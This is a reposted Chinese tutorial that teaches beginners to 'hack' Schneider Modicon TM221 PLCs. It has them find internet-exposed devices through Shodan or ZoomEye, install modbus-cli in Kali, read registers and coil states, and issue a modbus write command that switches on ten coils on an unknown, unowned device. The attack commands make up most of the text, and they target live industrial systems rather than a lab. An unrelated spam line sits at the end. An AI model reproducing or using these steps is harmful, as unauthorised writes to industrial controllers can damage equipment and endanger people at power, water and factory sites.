安基網 首頁 資訊 安全報 查看內容

SCADA工控黑客 : 小白也能“黑”施耐德TM221

2019-6-16 16:27| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 簡單介紹:SCADA/ICS工控安全隨著最近幾年的重大國際安全事件頻發得到了相當的重視黑掉一個發電站、一個水壩、一個工廠都可以引起相當巨大的后果與損失。我們這篇所說的TM221 Modicon PLC是由施耐德電子開發的一款 PLC(programmabl logic contrllers 可編程邏輯控制器)設備PLC在工控領域中有相當廣泛 ...

簡單介紹:

SCADA/ICS工控安全隨著最近幾年的重大國際安全事件頻發得到了相當的重視黑掉一個發電站、一個水壩、一個工廠都可以引起相當巨大的后果與損失。

我們這篇所說的TM221 Modicon PLC是由施耐德電子開發的一款 PLC(programmabl logic contrllers 可編程邏輯控制器)設備

PLC在工控領域中有相當廣泛的應用如油田、生產線、電網、發電站都有用到。

TM221 Modicon PLC 長這樣:

實驗用的工具 modbus-cli 在kali里面能夠找到

想了解工控數據交互的同學最好先看下 Modbus : SCADA/ICS 的通訊協協議。

開始黑

第一步:上 shodan或者zoomeye找TM221===

第二步:安裝 modbus-cli===

進入kali

安裝 modbus-cli

kali > gem install modbus-cli

用法 modbus-cli + 命令

modbus-cli Syntax

我們來看下有哪些命令

kali > modbus -help

基本的命令用法如下

kali > modbus [options] SUBCOMMAND [arguments]

第三部: TM221基本操作語法===

從施耐德的官網上我們找到了基本語法

第四部:用 Modbus-cli 獨處寄存數據

===

kali> modbus read %MW100 10

===

命令功能: 用 modbus 讀取前是個 0-9 寄存器的內容。

%MW100 -> 施耐德數據傳輸格式的的頭

10 -> 讀取寄存器數量

kali > modbus read 400101 10

============================

命令功能: 用 modbus 讀取前是個 0-9 寄存器的內容。

400101 -> 施耐德子牌 modicon 數據傳輸格式的的頭在這款PLC也可以使用效果相同

10 -> 讀取寄存器數量

第五步:讀取線圈開關狀態

===

當我們用%M100去做讀取操作時如上表會返回一個布爾值。

這個值就代表這個線圈開關的狀態,如果這個值為1則對應控制的設備就處于通電工作的狀態。

圖中返回值顯示目前 100 102 104 都處于開啟狀態

第六步:打開開關

===

kali > modbus write %MW100 1 1 1 1 1 1 1 1 1 1

請求結束后我們在讀取看看狀態?

全打開了!!!

結論:

就這么簡單

。世界的另一頭10個開關就被小白打開了,對應的設備是什么呢?那就不得而知了~



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6703035058900435469/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
云南快乐十分开奖结果前三